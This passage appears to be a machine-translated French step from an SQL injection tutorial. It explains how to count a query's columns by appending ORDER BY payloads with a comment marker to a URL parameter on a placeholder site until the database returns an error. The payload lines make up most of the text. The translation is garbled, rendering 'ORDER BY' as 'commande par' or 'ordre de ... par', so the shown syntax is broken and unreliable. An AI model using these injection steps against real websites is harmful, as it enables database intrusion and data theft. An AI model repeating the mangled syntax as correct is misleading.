Étape 2: Déterminer le nombre de colonnes
Nous allons utiliser la commande appelée Order by. Cette commande indique à base de données comment commander le résultat.
Pour utiliser cette commande, supprimez l’apostrophe (') que vous avez tapé avant et saisissez commande commande par 1--
Le site Web sera : http://Vulnerable.com/goodies.php?id=10 commande par 1--
Maintenant, gardez la multiplication jusqu'à ce que nous obtenons une erreur
Astuce : La "--" est un double trait d’Union / moins symbole
[Voici comment cela fonctionne]
ordre de http://Vulnerable.com/goodies.php?id=10 par 1--< = nous n’obtenons aucune erreur
ordre de http://Vulnerable.com/goodies.php?id=10 par 2--< = nous n’obtenons aucune erreur
ordre de http://Vulnerable.com/goodies.php?id=10 par 3--< = nous n’obtenons aucune erreur
http://Vulnerable.com/goodies.php?id=10 commande par 4--< = nous n’obtenons aucune erreur
ordre de http://Vulnerable.com/goodies.php?id=10 par 5--< = nous n’obtenons aucune erreur
ordre de http://Vulnerable.com/goodies.php?id=10 par 6--< = nous n’obtenons aucune erreur
ordre de http://Vulnerable.com/goodies.php?id=10 par 7--< = nous n’obtenons aucune erreur
http://Vulnerable.com/goodies.php?id=10 commande par 8--< = nous n’obtenons aucune erreur
http://Vulnerable.com/goodies.php?id=10 ordre de 9--< = Bingo ! Nous avons erreur "Unknown column '9' dans la « clause order »"
, Nous avons eu une erreur sur le neuvième à essayer. Il y a 8 colonnes.